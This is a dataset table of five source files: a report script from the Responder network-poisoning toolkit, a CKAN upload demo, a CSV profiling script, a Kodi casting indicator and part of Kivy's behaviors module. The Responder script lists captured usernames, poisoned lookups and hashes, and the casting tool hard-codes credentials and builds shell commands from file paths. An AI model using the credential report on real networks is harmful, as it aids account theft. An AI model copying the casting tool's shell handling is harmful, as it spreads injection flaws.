| repo_name | path | copies | size | content | license | hash | line_mean | line_max | alpha_frac | autogenerated | ratio | config_test | has_no_keywords | few_assignments |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
tholum/PiBunny
|
system.d/library/tools_installer/tools_to_install/responder/Report.py
|
1
|
3980
|
#!/usr/bin/env python
# This file is part of Responder, a network take-over set of tools
# created and maintained by Laurent Gaffie.
# email: laurent.gaffie@gmail.com
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import sqlite3
import os
import settings  # color() below logs via settings.Config.*Logger
def color(txt, code = 1, modifier = 0):
if txt.startswith('[*]'):
settings.Config.PoisonersLogger.warning(txt)
elif 'Analyze' in txt:
settings.Config.AnalyzeLogger.warning(txt)
if os.name == 'nt': # No colors for windows...
return txt
return "\033[%d;3%dm%s\033[0m" % (modifier, code, txt)
def DbConnect():
cursor = sqlite3.connect("./Responder.db")
return cursor
def GetResponderData(cursor):
res = cursor.execute("SELECT * FROM Responder")
for row in res.fetchall():
print('{0} : {1}, {2}, {3}, {4}, {5}, {6}, {7}, {8}'.format(row[0], row[1], row[2], row[3], row[4], row[5], row[6], row[7], row[8]))
def GetResponderUsernamesStatistic(cursor):
res = cursor.execute("SELECT COUNT(DISTINCT UPPER(user)) FROM Responder")
for row in res.fetchall():
print color('[+] In total {0} unique user accounts were captured.'.format(row[0]), code = 2, modifier = 1)
def GetResponderUsernames(cursor):
res = cursor.execute("SELECT DISTINCT user FROM Responder")
for row in res.fetchall():
print('User account: {0}'.format(row[0]))
def GetResponderUsernamesWithDetails(cursor):
res = cursor.execute("SELECT client, user, module, type, cleartext FROM Responder WHERE UPPER(user) in (SELECT DISTINCT UPPER(user) FROM Responder) ORDER BY client")
for row in res.fetchall():
print('IP: {0} module: {1}:{3}\nuser account: {2}'.format(row[0], row[2], row[1], row[3]))
def GetResponderCompleteHash(cursor):
res = cursor.execute("SELECT fullhash FROM Responder WHERE UPPER(user) in (SELECT DISTINCT UPPER(user) FROM Responder)")
for row in res.fetchall():
print('{0}'.format(row[0]))
def GetUniqueLookups(cursor):
res = cursor.execute("SELECT * FROM Poisoned WHERE ForName in (SELECT DISTINCT UPPER(ForName) FROM Poisoned) ORDER BY SentToIp, Poisoner")
for row in res.fetchall():
print('IP: {0}, Protocol: {1}, Looking for name: {2}'.format(row[2], row[1], row[3]))
def GetStatisticUniqueLookups(cursor):
res = cursor.execute("SELECT COUNT(*) FROM Poisoned WHERE ForName in (SELECT DISTINCT UPPER(ForName) FROM Poisoned)")
for row in res.fetchall():
print color('[+] In total {0} unique queries were poisoned.'.format(row[0]), code = 2, modifier = 1)
def SavePoisonersToDb(result):
for k in [ 'Poisoner', 'SentToIp', 'ForName', 'AnalyzeMode']:
if not k in result:
result[k] = ''
def SaveToDb(result):
for k in [ 'module', 'type', 'client', 'hostname', 'user', 'cleartext', 'hash', 'fullhash' ]:
if not k in result:
result[k] = ''
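# Illustrative sketch (added; not part of the original script): the queries above
# assume a pre-existing Responder.db. The column layout below is inferred from the
# SELECT statements and the Save*Db() key lists, so treat it as an assumption rather
# than the canonical Responder schema. The helper is never called by this report.
def CreateAssumedSchema(cursor):
    cursor.execute("CREATE TABLE IF NOT EXISTS Responder (timestamp TEXT, module TEXT, type TEXT, client TEXT, hostname TEXT, user TEXT, cleartext TEXT, hash TEXT, fullhash TEXT)")
    cursor.execute("CREATE TABLE IF NOT EXISTS Poisoned (timestamp TEXT, Poisoner TEXT, SentToIp TEXT, ForName TEXT, AnalyzeMode TEXT)")
    cursor.commit()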
cursor = DbConnect()
print color("[+] Generating report...", code = 3, modifier = 1)
print color("[+] Unique lookups ordered by IP:", code = 2, modifier = 1)
GetUniqueLookups(cursor)
GetStatisticUniqueLookups(cursor)
print color("\n[+] Extracting captured usernames:", code = 2, modifier = 1)
GetResponderUsernames(cursor)
print color("\n[+] Username details:", code = 2, modifier = 1)
GetResponderUsernamesWithDetails(cursor)
GetResponderUsernamesStatistic(cursor)
#print color("\n[+] Captured hashes:", code = 2, modifier = 1)
#GetResponderCompleteHash(cursor)
|
mit
| -430,646,472,000,770,940
| 40.894737
| 170
| 0.691457
| false
| 3.35865
| false
| false
| false
|
thriuin/ckan_client_demo
|
create_open_data.py
|
1
|
1540
|
__author__ = 'Statistics Canada'
__copyright__ = 'Crown Copyright, Canada 2014'
import urllib2
import simplejson as json
# Add a new data set. For this example, we will use the NAICS 2012 dataset from Statistics Canada
# Ensure the data set does not already exist. Exit if it does
query_data = urllib2.quote(json.dumps({'id': '9b25e61a-89c3-4719-afd8-fc61c7aeba0c'}))
found = False
try:
# Use a valid URL
response = urllib2.urlopen('http://data.gc.ca/test/api/3/action/package_show', query_data)
if response.code == 200:
print "Data set already exists."
exit()
except urllib2.HTTPError, hx:
# If the data set is not found, a 404 exception is thrown
if hx.code == 404:
"Data set not found. Proceeding..."
else:
print "Unexpected error: " + hx.__str__()
exit()
# Load the JSON and call the CKAN API function package_create()
try:
new_ds = json.load(open("new_data_set.json"))
except json.JSONDecodeError, jx:
print('Invalid JSON: ' + jx.__str__())
# Encode the JSON for the HTTP header
new_ds_string = urllib2.quote(json.dumps(new_ds))
# Call the CKAN API function package_create(). Use a valid URL
request = urllib2.Request('http://data.gc.ca/test/api/action/package_create')
# Replace xxxx... with an appropriate API Key
request.add_header('Authorization', 'xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx')
try:
response = urllib2.urlopen(request, new_ds_string)
print "CKAN Return Code: " + response.code
except urllib2.HTTPError, hx:
print hx.__str__()
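# Illustrative helper (added; not part of the original demo): both API calls above
# follow the same pattern - JSON-encode the parameters, URL-quote them, and POST them
# to a CKAN action endpoint, optionally with an API key in the Authorization header.
# The helper is unused here and the argument names are placeholders.
def call_ckan_action(action_url, params, api_key=None):
    body = urllib2.quote(json.dumps(params))
    request = urllib2.Request(action_url)
    if api_key is not None:
        request.add_header('Authorization', api_key)
    return urllib2.urlopen(request, body)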
|
mit
| -5,844,206,824,841,157,000
| 31.083333
| 97
| 0.687013
| false
| 3.276596
| false
| false
| false
|
android-art-intel/marshmallow
|
art-extension/tools/perf_analysis/find_hottest.py
|
1
|
3556
|
#!/usr/bin/python
import os, sys, csv, operator, heapq
def GetMethodName(filename):
with open(filename, 'rb') as csvfile:
spamreader = csv.reader(csvfile, delimiter=';', quotechar='"')
for row in spamreader:
for cell in row:
return cell
def AppendData(filename, data):
data[filename] = {}
with open(filename, 'rb') as csvfile:
spamreader = csv.reader(csvfile, delimiter=';', quotechar='"')
for i,row in enumerate(spamreader):
data[filename][i] = {}
for j,cell in enumerate(row):
data[filename][i][j] = cell
def is_number(s):
try:
float(s)
return True
except ValueError:
return False
def ComputeData(data, max_data, sum_data):
for filename in data:
for i in data[filename]:
if len(max_data) < len(data[filename]):
max_data.append([])
if len(sum_data) < len(data[filename]):
sum_data.append([])
for j in data[filename][i]:
# append new 0s if any
if len(max_data[i]) < len(data[filename][i]):
max_data[i].append(0)
if len(sum_data[i]) < len(data[filename][i]):
sum_data[i].append(0)
# if cell is a number, then we can update our numbers.
if is_number(data[filename][i][j]):
if len(max_data[i]) < len(data[filename][i]):
max_data[i].append(0)
if len(sum_data[i]) < len(data[filename][i]):
sum_data[i].append(0)
f_data = float(data[filename][i][j])
f_max = float(max_data[i][j])
# compute max data
if f_max < f_data:
max_data[i][j] = f_data
# compute sum data
sum_data[i][j] += f_data
else:
max_data[i][j] = data[filename][i][j]
sum_data[i][j] = data[filename][i][j]
def ComputeSumPerMethod(data, sum_per_method, metric_id):
for filename in data:
sum_per_method[filename] = 0
for i in data[filename]:
if is_number(data[filename][i][metric_id]):
sum_per_method[filename] += float(data[filename][i][metric_id])
def DumpData(output_name, data, max_data, sum_data):
if len(data) == 0:
return
with open(output_name, 'wb') as myfile:
wr = csv.writer(myfile, quoting=csv.QUOTE_ALL)
wr.writerow(['Max'])
for row in max_data:
wr.writerow(row)
wr.writerow(['Sum'])
for row in sum_data:
wr.writerow(row)
def DumpHottestMethods(output_name, sorted_methods, sum_per_method):
if len(sorted_methods) == 0:
return
with open(output_name, 'wb') as myfile:
wr = csv.writer(myfile, quoting=csv.QUOTE_ALL)
for filename in sorted_methods:
wr.writerow([GetMethodName(filename), sum_per_method[filename]])
if len(sys.argv) != 2:
print "Usage: ./find_hottest.py [folder-name]"
sys.exit(0)
data = {}
folder_name = sys.argv[1]
found_file = False
print "Collecting data..."
for filename in os.listdir(folder_name):
if filename.endswith(".csv"):
filename = folder_name + "/" + filename
AppendData(filename, data)
found_file = True
if found_file == False:
print "There is no CSV file in folder " + folder_name
else:
sum_per_method = {}
print "Computing sum per method..."
ComputeSumPerMethod(data, sum_per_method, 1)
print "Sorting data..."
# sorted_methods = heapq.nlargest(10, list(sum_per_method))
sorted_methods = list(sorted(sum_per_method, key=sum_per_method.__getitem__, reverse=True))
print "Dumping data..."
DumpHottestMethods("hottest_methods.csv", sorted_methods, sum_per_method)
sys.stdout.write("\nDone.\n")
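# Note (added for clarity): the commented-out heapq line in the sorting step above
# would rank file names lexicographically rather than by their accumulated metric.
# If only a top-N were wanted, a key function keeps the per-method sums as the
# ranking criterion; the helper below is an illustrative, unused sketch.
def top_n_methods(sums, n=10):
    # Return the n CSV file names with the largest accumulated metric values.
    return heapq.nlargest(n, sums, key=sums.get)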
|
apache-2.0
| -1,728,301,882,559,878,000
| 28.38843
| 93
| 0.61108
| false
| 3.235669
| false
| false
| false
|
gazhay/kodikast
|
lukecast.py
|
1
|
12945
|
#!/usr/bin/env python3
import gi
gi.require_version('Gtk', '3.0')
from gi.repository import Gtk, GLib, GdkPixbuf
try:
gi.require_version('AppIndicator3', '0.1')
from gi.repository import AppIndicator3 as AppIndicator
except:
from gi.repository import AppIndicator
import re,subprocess,socket
import urllib.parse,time,os,signal,sys
import base64
from random import randint
from zeroconf import ServiceBrowser, Zeroconf
from gi.repository import GObject
tempsock = "/tmp/lukecast"
# TODO
# Playlist - if we can vlc:quit after a file, we can do multiple files
# Broadcast - stream to all clients found
# Authorisation at Kodi End - uname pwd
#
VERSION = "0.5a"
ICONDIR = "./kodikasticons"
DEVMODE = True
def shellquote(s):
return "'" + s.replace("'", "'\\''") + "'"
def alert(msg):
parent = None
md = Gtk.MessageDialog(parent, 0, Gtk.MessageType.INFO, Gtk.ButtonsType.CLOSE, msg)
md.run()
md.destroy()
Hosts = []
MandatoryFudgePeriod = 3;
# Check for VLC
isVLC = subprocess.run(["which vlc"], stdout=subprocess.PIPE, shell=True)
# print(isVLC.stdout)
if (isVLC.stdout==b''):
alert("VLC is not installed, cannot continue")
quit()
# Check for webcam
videoDevs = subprocess.run(["ls /dev/video* | wc -l"], stdout=subprocess.PIPE, shell=True)
if (videoDevs.stdout!=b''):
# print("Number of devices {%d}" % int(videoDevs.stdout));
videoOn=True
else:
videoOn=False
def get_resource_path(rel_path):
dir_of_py_file = os.path.dirname(__file__)
rel_path_to_resource = os.path.join(dir_of_py_file, rel_path)
abs_path_to_resource = os.path.abspath(rel_path_to_resource)
return abs_path_to_resource
# ############################################################################## Indicator
class IndicatorKodicast:
SubMenuRef = ""
SubMenuGroup = ""
KodiTarget = ""
VLCPid = ""
mode = 0
# lastConnect = None
# statusIcons = [ "KodiKast-Red", "KodiKast-Grn", "KodiKast-Ylw", "KodiKast-Ppl" ]
statusIcons = [ "LukeInit", "LukeGrey", "LukeGreen", "LukeBlue" ]
def addSeperator(self, menu):
item = Gtk.SeparatorMenuItem()
item.show()
menu.append(item)
def addMenuItem(self, menu, label, handler):
item = Gtk.MenuItem()
item.set_label(label)
item.connect("activate", handler)
item.show()
menu.append(item)
def addRadioMenu(self, menu, label):
item = Gtk.CheckMenuItem(label=label)
item.set_active(is_active=False)
# item.connect("activate", self.toggleMe)
item.show()
menu.append(item)
def addSubMenu(self, menu, label):
pass
def aboutDialog(self, evt):
dlg = Gtk.AboutDialog();
dlg.set_name("About...")
dlg.set_program_name("Luke Cast")
dlg.set_version(VERSION)
dlg.set_comments("""
A GTK Indicator to stream media to Avahi discovered Kodi instances.
Media, Screen, Webcam, to any Kodi with jsonrpc enabled.
""")
dlg.set_authors(['Gareth Hay'])
pixbuf = GdkPixbuf.Pixbuf.new_from_file_at_size(get_resource_path(ICONDIR)+"/"+self.statusIcons[ randint(0, len(self.statusIcons)-1) ]+".png" , 100, 100)
dlg.set_logo(pixbuf)
# dlg.set_logo_icon_name("kodi")
dlg.show()
def reboot(self, evt):
self.handler_cast_stop()
Gtk.main_quit()
os.execv(__file__, sys.argv)
def __init__(self):
self.ind = AppIndicator.Indicator.new("indicator-lukecast", self.statusIcons[0], AppIndicator.IndicatorCategory.SYSTEM_SERVICES)
self.ind.set_icon_theme_path( get_resource_path(ICONDIR))
self.ind.set_icon( self.statusIcons[0] )
self.ind.set_status (AppIndicator.IndicatorStatus.ACTIVE)
self.mode = 0
# have to give indicator a menu
self.menu = Gtk.Menu()
self.addMenuItem( self.menu, "About...", self.aboutDialog)
if DEVMODE:
self.addMenuItem( self.menu, "Restart", self.reboot)
self.addMenuItem(self.menu, "Reconnect Receiver", self.handler_reconnect )
self.addSeperator(self.menu)
item = Gtk.MenuItem()
item.set_label("Available Receivers")
submenu = Gtk.Menu()
subitem = Gtk.RadioMenuItem(group=None, label="Nowhere")
subitem.set_active(is_active=True)
subitem.connect("activate", self.handlesubChecks)
subitem.show()
submenu.append(subitem)
submenu.show()
item.set_submenu( submenu )
self.SubMenuGroup = subitem
self.SubMenuRef = submenu
item.show()
self.menu.append(item)
self.addSeperator( self.menu )
self.addMenuItem(self.menu, "Start Screen Cast" , self.handler_cast_start)
self.addMenuItem(self.menu, "Start File Cast...", self.handler_cast_file )
if videoOn:
self.addMenuItem(self.menu, "Start Webcam Stream0" , self.handler_cast_cam )
self.addRadioMenu(self.menu, " With Sound")
self.addMenuItem(self.menu, "Stop Cast" , self.handler_cast_stop )
self.addSeperator( self.menu )
self.addMenuItem(self.menu, "Exit" , self.handler_menu_exit )
self.menu.show()
self.ind.set_menu(self.menu)
GLib.timeout_add_seconds(1, self.handler_timeout)
def handler_reconnect(self,evt=None, hosts=None):
if hosts==None:
hosts = self.KodiTarget
if socket.gethostname().find('.')>=0:
thisisme=socket.gethostname()
else:
thisisme=socket.gethostbyaddr(socket.gethostname())[0]
jsonpart = {'request' : '{"jsonrpc":"2.0", "id":1, "method": "Player.Open","params":{"item":{"file":"http://%s:8554/stream.mp4"}}}' % thisisme }
jsonstr = urllib.parse.urlencode(jsonpart) # added parse. as its moved in python3
# This will have to be for multiple hosts
streamUrl = 'http://%s:8080/jsonrpc?' % (hosts)
streamUrl+= jsonstr
credentials = b'kodi:test'
encoded_credentials = base64.b64encode(credentials)
authorization = b'Basic ' + encoded_credentials
command = "/usr/bin/curl -g -H 'Content-Type: application/json' -H 'Authorization: %s' -H 'Accept: application/json' '%s'" % (authorization.decode("utf-8") , streamUrl)
print("Executing %s" % command)
curlProc = subprocess.run(command, stdout=subprocess.PIPE, shell=True)
print(curlProc.stdout)
connect_hosts=handler_reconnect
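# Note (added for clarity): handler_reconnect() asks the selected Kodi host, via its
# JSON-RPC HTTP API on port 8080, to Player.Open http://<this-machine>:8554/stream.mp4,
# i.e. the HTTP stream that streamUrlTo() serves from the local VLC process, and it
# authenticates with the HTTP Basic credentials hard-coded above (kodi:test).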
def handlesubChecks(self, evt):
if evt.get_active()==True:
self.KodiTarget = evt.get_label()
self.mode = 1
if self.KodiTarget == "Nowhere":
self.mode = 0
def handler_menu_exit(self, evt):
Gtk.main_quit()
def handler_cast_file(self, evt):
dialog = Gtk.FileChooserDialog("Please choose a file", None,
Gtk.FileChooserAction.OPEN,
(Gtk.STOCK_CANCEL, Gtk.ResponseType.CANCEL,
Gtk.STOCK_OPEN, Gtk.ResponseType.OK))
filter = Gtk.FileFilter()
filter.set_name("Videos")
filter.add_mime_type("video/mpeg")
filter.add_pattern("*.mp4")
filter.add_pattern("*.ogg")
filter.add_pattern("*.mkv")
filter.add_pattern("*.mpeg")
filter.add_pattern("*.avi")
dialog.add_filter(filter)
response = dialog.run()
ff = self.fudgeUri(dialog.get_filename())
dialog.destroy()
time.sleep(0.1)
if response == Gtk.ResponseType.OK:
self.streamUrlTo( ff, self.KodiTarget )
return
elif response == Gtk.ResponseType.CANCEL:
print("Cancel clicked")
def fudgeUri(self, inuri):
return "file://"+(inuri.replace("\n","").replace(" ","\ ")+" vlc://quit")
# /* Handle a dropped file on a desktop file with code below */
def handler_drop_cast_start(self):
content = open(tempsock, 'r').read()
if (len(content)>0):
# trim this and cvlc stream it.
# refactor stream launch code to function(url, hosts)
open(tempsock,"w").close()
content=self.fudgeUri(content)
# print(content)
if not self.targetCheck():
alert("No target selected")
return
self.streamUrlTo( content, self.KodiTarget )
self.lastConnect = None
time.sleep(0.1) # stops a cpu 100% problem
return True
def targetCheck(self):
if (self.KodiTarget == "") or (self.KodiTarget=="Nowhere"):
return False
return True
def streamUrlTo(self, uri, hostlist):
self.mode = 2 # :input-slave=alsa://hw:0,0
sout = "#transcode{vcodec=h264,acodec=mpga,ab=128,channels=2,samplerate=44100}:standard{access=http,mux=ts,ttl=15,dst=:8554/stream.mp4"
# sout = "#transcode{vcodec=h264,scale=1,vb=0}:standard{access=http,mux=ts,ttl=15,dst=:8554/}"
command = 'vlc -Idummy '+uri+' --sout "%s"' % sout
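# Note (added for clarity): the sout chain above transcodes the input to H.264 video
# with MPEG audio and serves it as an MPEG-TS stream over VLC's built-in HTTP server
# on port 8554, which is the URL handler_reconnect() hands to Kodi.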
# print("## Command to exec")
# print(command)
# print("##")
self.VLCPid = subprocess.Popen(command, shell=True, preexec_fn=os.setsid)
self.handler_reconnect(hosts=hostlist)
def handler_cast_start(self, evt=None):
if not self.targetCheck():
alert("No target selected")
return
self.streamUrlTo("screen:// :screen-fps=10 :screen-caching=10 vlc://quit", self.KodiTarget)
def handler_cast_cam(self, evt):
if not self.targetCheck():
alert("No target selected")
return
# With audio here
self.streamUrlTo("v4l2:///dev/video0 vlc://quit", self.KodiTarget)
def handler_cast_stop(self, evt=None):
self.stopCasting()
def handler_timeout(self):
"""This will be called every few seconds by the GLib.timeout.
"""
if self.KodiTarget=="Nowhere":
self.KodiTarget=""
self.mode = 0
if self.KodiTarget=="" and self.VLCPid != "":
self.killVLC()
if self.VLCPid != "":
try:
if self.VLCPid.poll()==None:
pass
else:
self.mode = 1
except OSError:
self.mode = 1
if (self.ind.get_icon() != self.statusIcons[self.mode]):
self.ind.set_icon(self.statusIcons[self.mode])
return True
def killVLC( self ):
try:
os.killpg(os.getpgid(self.VLCPid.pid), signal.SIGTERM)
except:
command = 'killall vlc'
process = subprocess.run(command, shell=True)
def stopCasting( self ):
self.mode = 1
self.killVLC()
def quitApp( self ):
self.stopCasting()
def main(self):
# attempt multiprocess shenanigans
GObject.idle_add(self.handler_drop_cast_start)
Gtk.main()
# ############################################################################## Avahi
class AvahiListener(object):
# Having problems removing - could be python2->3 conversion problems
target = ""
DEBUGME = False;
def remove_service(self, zeroconf, type, name):
for host in Hosts:
if host.get("name")== name:
info = host
for itemA in self.target.SubMenuRef.get_children():
if itemA.get_label()==info['info'].server:
if itemA.get_active():
self.target.KodiTarget = ""
self.target.mode=0
self.target.SubMenuRef.remove(itemA) #itemA.remove()
if self.DEBUGME: print("Service %s removed" % (info['info'].server,))
Hosts.remove(info)
def add_service(self, zeroconf, type, name):
info = zeroconf.get_service_info(type, name)
# subitem = Gtk.CheckMenuItem()
subitem = Gtk.RadioMenuItem(group=self.target.SubMenuGroup, label=info.server)
subitem.connect("activate", self.target.handlesubChecks)
subitem.set_label(info.server)
subitem.show()
self.target.SubMenuRef.append(subitem)
self.target.SubMenuRef.show()
Hosts.append({"name": name, "info": info})
if self.DEBUGME: print("Service %s removed" % (info['info'].server,))
def setTarget(self, targetobj):
self.target = targetobj
# ############################################################################## Main
if __name__ == "__main__":
try:
zeroconf = Zeroconf()
listener = AvahiListener()
ind = IndicatorKodicast()
listener.setTarget(ind);
browser = ServiceBrowser(zeroconf, "_xbmc-jsonrpc._tcp.local.", listener)
try:
open(tempsock,"w").close();
except:
print( "socket file not available")
pass
ind.main()
finally:
ind.handler_cast_stop()
|
gpl-3.0
| -4,870,596,901,379,037,000
| 34.368852
| 178
| 0.588335
| false
| 3.573006
| false
| false
| false
|
angryrancor/kivy
|
kivy/uix/behaviors.py
|
1
|
56965
|
'''
Behaviors
=========
.. versionadded:: 1.8.0
This module implements behaviors that can be mixed with existing base widgets.
For example, if you want to add a "button" capability to an
:class:`~kivy.uix.image.Image`, you could do::
class IconButton(ButtonBehavior, Image):
pass
This would give you an :class:`~kivy.uix.image.Image` with the events and
properties inherited from :class:`ButtonBehavior`. For example, the *on_press*
and *on_release* events would be fired when appropriate::
class IconButton(ButtonBehavior, Image):
def on_press(self):
print("on_press")
Or in kv::
IconButton:
on_press: print('on_press')
Naturally, you could also bind to any property changes the behavior class
offers::
def state_changed(*args):
print('state changed')
button = IconButton()
button.bind(state=state_changed)
.. note::
The behavior class must always be _before_ the widget class. If you don't
specify the inheritance in this order, the behavior will not work because
the behavior methods are overwritten by the methods of the class listed first.
Similarly, if you combine a behavior class with a class which
requires the use of the methods also defined by the behavior class, the
resulting class may not function properly. E.g. combining a ButtonBehavior
with a Slider, both of which require the on_touch_up method, the resulting
class will not work.
'''
__all__ = ('ButtonBehavior', 'ToggleButtonBehavior', 'DragBehavior',
'FocusBehavior', 'CompoundSelectionBehavior')
from kivy.clock import Clock
from kivy.properties import OptionProperty, ObjectProperty, NumericProperty,\
ReferenceListProperty, BooleanProperty, ListProperty, AliasProperty
from kivy.config import Config
from kivy.metrics import sp
from kivy.base import EventLoop
from kivy.logger import Logger
from functools import partial
from weakref import ref
from time import time
import string
# When we are generating documentation, Config doesn't exist
_scroll_timeout = _scroll_distance = 0
_is_desktop = False
_keyboard_mode = 'system'
if Config:
_scroll_timeout = Config.getint('widgets', 'scroll_timeout')
_scroll_distance = Config.getint('widgets', 'scroll_distance')
_is_desktop = Config.getboolean('kivy', 'desktop')
_keyboard_mode = Config.get('kivy', 'keyboard_mode')
class ButtonBehavior(object):
'''Button behavior.
:Events:
`on_press`
Fired when the button is pressed.
`on_release`
Fired when the button is released (i.e. the touch/click that
pressed the button goes away).
'''
state = OptionProperty('normal', options=('normal', 'down'))
'''State of the button, must be one of 'normal' or 'down'.
The state is 'down' only when the button is currently touched/clicked,
otherwise 'normal'.
:attr:`state` is an :class:`~kivy.properties.OptionProperty`.
'''
last_touch = ObjectProperty(None)
'''Contains the last relevant touch received by the Button. This can
be used in `on_press` or `on_release` in order to know which touch
dispatched the event.
.. versionadded:: 1.8.0
:attr:`last_touch` is a :class:`~kivy.properties.ObjectProperty`,
defaults to None.
'''
MIN_STATE_TIME = 0.035
'''The minimum period of time which the widget must remain in the
`'down'` state.
:attr:`MIN_STATE_TIME` is a float.
'''
always_release = BooleanProperty(True)
'''This determines if the widget fires a `on_release` event if
the touch_up is outside the widget.
.. versionadded:: 1.9.0
:attr:`always_release` is a :class:`~kivy.properties.BooleanProperty`,
defaults to `True`.
'''
def __init__(self, **kwargs):
self.register_event_type('on_press')
self.register_event_type('on_release')
super(ButtonBehavior, self).__init__(**kwargs)
self.__state_event = None
self.__touch_time = None
self.fbind('state', self.cancel_event)
def _do_press(self):
self.state = 'down'
def _do_release(self, *args):
self.state = 'normal'
def cancel_event(self, *args):
if self.__state_event:
self.__state_event.cancel()
self.__state_event = None
def on_touch_down(self, touch):
if super(ButtonBehavior, self).on_touch_down(touch):
return True
if touch.is_mouse_scrolling:
return False
if not self.collide_point(touch.x, touch.y):
return False
if self in touch.ud:
return False
touch.grab(self)
touch.ud[self] = True
self.last_touch = touch
self.__touch_time = time()
self._do_press()
self.dispatch('on_press')
return True
def on_touch_move(self, touch):
if touch.grab_current is self:
return True
if super(ButtonBehavior, self).on_touch_move(touch):
return True
return self in touch.ud
def on_touch_up(self, touch):
if touch.grab_current is not self:
return super(ButtonBehavior, self).on_touch_up(touch)
assert(self in touch.ud)
touch.ungrab(self)
self.last_touch = touch
if (not self.always_release
and not self.collide_point(*touch.pos)):
self.state = 'normal'
return
touchtime = time() - self.__touch_time
if touchtime < self.MIN_STATE_TIME:
self.__state_event = Clock.schedule_once(
self._do_release, self.MIN_STATE_TIME - touchtime)
else:
self._do_release()
self.dispatch('on_release')
return True
def on_press(self):
pass
def on_release(self):
pass
def trigger_action(self, duration=0.1):
'''Trigger whatever action(s) have been bound to the button by calling
both the on_press and on_release callbacks.
This simulates a quick button press without using any touch events.
Duration is the length of the press in seconds. Pass 0 if you want
the action to happen instantly.
.. versionadded:: 1.8.0
'''
self._do_press()
self.dispatch('on_press')
def trigger_release(dt):
self._do_release()
self.dispatch('on_release')
if not duration:
trigger_release(0)
else:
Clock.schedule_once(trigger_release, duration)
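    # Usage note (added; illustrative): trigger_action() lets a script or test simulate
    # a full press/release cycle without any touch event, e.g.
    # my_button.trigger_action(duration=0) fires on_press and on_release immediately.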
class ToggleButtonBehavior(ButtonBehavior):
'''ToggleButton behavior, see ToggleButton module documentation for more
information.
.. versionadded:: 1.8.0
'''
__groups = {}
group = ObjectProperty(None, allownone=True)
'''Group of the button. If None, no group will be used (button is
independent). If specified, :attr:`group` must be a hashable object, like
a string. Only one button in a group can be in 'down' state.
:attr:`group` is a :class:`~kivy.properties.ObjectProperty`
'''
allow_no_selection = BooleanProperty(True)
'''This specifies whether the checkbox in group allows everything to
be deselected.
.. versionadded:: 1.9.0
:attr:`allow_no_selection` is a :class:`BooleanProperty` defaults to
`True`
'''
def __init__(self, **kwargs):
self._previous_group = None
super(ToggleButtonBehavior, self).__init__(**kwargs)
def on_group(self, *largs):
groups = ToggleButtonBehavior.__groups
if self._previous_group:
group = groups[self._previous_group]
for item in group[:]:
if item() is self:
group.remove(item)
break
group = self._previous_group = self.group
if group not in groups:
groups[group] = []
r = ref(self, ToggleButtonBehavior._clear_groups)
groups[group].append(r)
def _release_group(self, current):
if self.group is None:
return
group = self.__groups[self.group]
for item in group[:]:
widget = item()
if widget is None:
group.remove(item)
if widget is current:
continue
widget.state = 'normal'
def _do_press(self):
if (not self.allow_no_selection and
self.group and self.state == 'down'):
return
self._release_group(self)
self.state = 'normal' if self.state == 'down' else 'down'
def _do_release(self, *args):
pass
@staticmethod
def _clear_groups(wk):
# auto flush the element when the weak reference has been deleted
groups = ToggleButtonBehavior.__groups
for group in list(groups.values()):
if wk in group:
group.remove(wk)
break
@staticmethod
def get_widgets(groupname):
'''Return the widgets contained in a specific group. If the group
doesn't exist, an empty list will be returned.
.. important::
Always release the result of this method! In doubt, do::
l = ToggleButtonBehavior.get_widgets('mygroup')
# do your job
del l
.. warning::
It's possible that some widgets that you have previously
deleted are still in the list. Garbage collector might need
more elements before flushing it. The return of this method
is informative, you've been warned!
'''
groups = ToggleButtonBehavior.__groups
if groupname not in groups:
return []
return [x() for x in groups[groupname] if x()][:]
class DragBehavior(object):
'''Drag behavior. When combined with a widget, dragging in the rectangle
defined by :attr:`drag_rectangle` will drag the widget.
For example, to make a popup which is draggable by its title do::
from kivy.uix.behaviors import DragBehavior
from kivy.uix.popup import Popup
class DragPopup(DragBehavior, Popup):
pass
And in .kv do::
<DragPopup>:
drag_rectangle: self.x, self.y+self._container.height, self.width,\
self.height - self._container.height
drag_timeout: 10000000
drag_distance: 0
.. versionadded:: 1.8.0
'''
drag_distance = NumericProperty(_scroll_distance)
'''Distance to move before dragging the :class:`DragBehavior`, in pixels.
As soon as the distance has been traveled, the :class:`DragBehavior` will
start to drag, and no touch event will go to children.
It is advisable that you base this value on the dpi of your target device's
screen.
:attr:`drag_distance` is a :class:`~kivy.properties.NumericProperty`,
defaults to 20 (pixels), according to the default value of scroll_distance
in user configuration.
'''
drag_timeout = NumericProperty(_scroll_timeout)
'''Timeout allowed to trigger the :attr:`drag_distance`, in milliseconds.
If the user has not moved :attr:`drag_distance` within the timeout,
dragging will be disabled, and the touch event will go to the children.
:attr:`drag_timeout` is a :class:`~kivy.properties.NumericProperty`,
defaults to 55 (milliseconds), according to the default value of
scroll_timeout in user configuration.
'''
drag_rect_x = NumericProperty(0)
'''X position of the axis aligned bounding rectangle where dragging
is allowed. In window coordinates.
:attr:`drag_rect_x` is a :class:`~kivy.properties.NumericProperty`,
defaults to 0.
'''
drag_rect_y = NumericProperty(0)
'''Y position of the axis aligned bounding rectangle where dragging
is allowed. In window coordinates.
:attr:`drag_rect_y` is a :class:`~kivy.properties.NumericProperty`,
defaults to 0.
'''
drag_rect_width = NumericProperty(100)
'''Width of the axis aligned bounding rectangle where dragging is allowed.
:attr:`drag_rect_width` is a :class:`~kivy.properties.NumericProperty`,
defaults to 100.
'''
drag_rect_height = NumericProperty(100)
'''Height of the axis aligned bounding rectangle where dragging is allowed.
:attr:`drag_rect_height` is a :class:`~kivy.properties.NumericProperty`,
defaults to 100.
'''
drag_rectangle = ReferenceListProperty(drag_rect_x, drag_rect_y,
drag_rect_width, drag_rect_height)
'''Position and size of the axis aligned bounding rectangle where dragging
is allowed.
:attr:`drag_rectangle` is a :class:`~kivy.properties.ReferenceListProperty`
of (:attr:`drag_rect_x`, :attr:`drag_rect_y`, :attr:`drag_rect_width`,
:attr:`drag_rect_height`) properties.
'''
def __init__(self, **kwargs):
self._drag_touch = None
super(DragBehavior, self).__init__(**kwargs)
